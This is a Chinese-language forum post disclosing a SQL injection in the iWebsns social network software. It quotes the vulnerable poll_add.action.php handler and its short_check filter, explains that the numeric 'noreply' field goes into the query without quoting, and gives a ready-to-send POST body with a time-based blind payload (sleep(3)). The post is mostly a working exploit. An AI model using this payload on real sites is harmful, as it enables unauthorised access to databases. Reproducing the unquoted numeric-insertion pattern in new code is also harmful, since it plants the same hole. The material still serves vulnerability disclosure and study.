iWebsns最新版SQL注入

#作者:小飞(PS:作为发过两篇文章的本站的编辑之一。表示无法容忍了..他的文章还要我来X)
#Email:f3i@t00ls.net

问题出在action/poll/poll_add.action.php下

<?php

//引入模块公共方法文件
require("api/base_support.php");
require("foundation/aintegral.php");

//引入语言包
$pol_langpackage=new polllp;

//权限验证
if(!get_argp('action')){
        action_return(0,"$pol_langpackage->pol_error",-1);exit;
}

//变量声明区
        $user_id=get_sess_userid();
        $user_name=get_sess_username();
        $userico=get_sess_userico();
  $subject=short_check(get_argp('subject'));
  $message=short_check(get_argp('message'));
  $sex=short_check(get_argp('sex'));
  $noreply=short_check(get_argp('noreply'));
  $expiration=short_check(get_argp('expiration'));
  $reward=short_check(get_argp('reward'));
  $credit=short_check(get_argp('credit'));
  $percredit=short_check(get_argp('percredit'));
  $makefeed=short_check(get_argp('makefeed'));
  $maxchoice=short_check(get_argp('maxchoice'));
  $cho=array_unique(get_argp('option'));
  $tag=short_check(get_argp('tag'));

//数据表定义区
        $t_poll=$tablePreStr."poll";
        $t_polloption=$tablePreStr."polloption";

//定义写操作
  dbtarget('w',$dbServs);
  $dbo=new dbex();

   foreach($cho as $value){
          if(short_check($value)!=''){
                  $cho_array[]=short_check($value);
          }
  }

  if($maxchoice==1){
          $input_type='radio';
  }else{
          $input_type='checkbox';
  }

  $poll_option="<input type=\"".$input_type."\" disabled />".$cho_array[0]."<br />";
  $poll_option.="<input type=\"".$input_type."\" disabled />".$cho_array[1]."<br />";
  $poll_option.="......";

  $cho_ser=serialize(array($cho_array[0],$cho_array[1]));

  $multiple=($maxchoice==1)? 0 : 1;
  $cre_value=empty($credit) ? 0 : intval($credit);
  $per_value=empty($percredit) ? 0 : intval($percredit);

  $sql="insert into $t_poll (`user_id`,`username`,`user_ico`,`subject`,`multiple`,`maxchoice`,`sex`,`noreply`,`dateline`,`credit`,`percredit`,`expiration`,`message`,`option`) values ($user_id,'$user_name','$userico','$subject',$multiple,$maxchoice,$sex,$noreply,'".constant('NOWTIME')."',$cre_value,$per_value,'$expiration','$message','$cho_ser')";

 $dbo->exeUpdate($sql);

其中的noreply在后文sql语句中是以数字型变量插入的
但是有个过滤函数
我们看看这个short_check

function short_check($str) { 

$MaxSlen=500;//限制短输入项最多300个字符 

if (!get_magic_quotes_gpc()) // 判断magic_quotes_gpc是否打开 

{ $str = addslashes($str); // 进行过滤 }

 $str = LenLimit($str,$MaxSlen);

 $str = str_replace(array("\'","\\","#"),"",$str); 

if($str!=''){ $str= htmlspecialchars($str); }

 return preg_replace("/ +/","",trim($str)); 

}

可以看到过滤的很全
对‘ \都有过滤 但是这里是数字型注入
同时限制了长度 注意就好
打印一下语句

3

2

subject=asd&message=&option[]=qwe&option[]=rty&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&option[]=&maxchoice=1&expiration=2015-01-27&sex=1&noreply=if(1=1,sleep(3),1),1,0,0,1,1,1);-- s&reward=0&credit=&percredit=&makefeed=1&action=%E7%A1%AE%E5%AE%9A

1

发表评论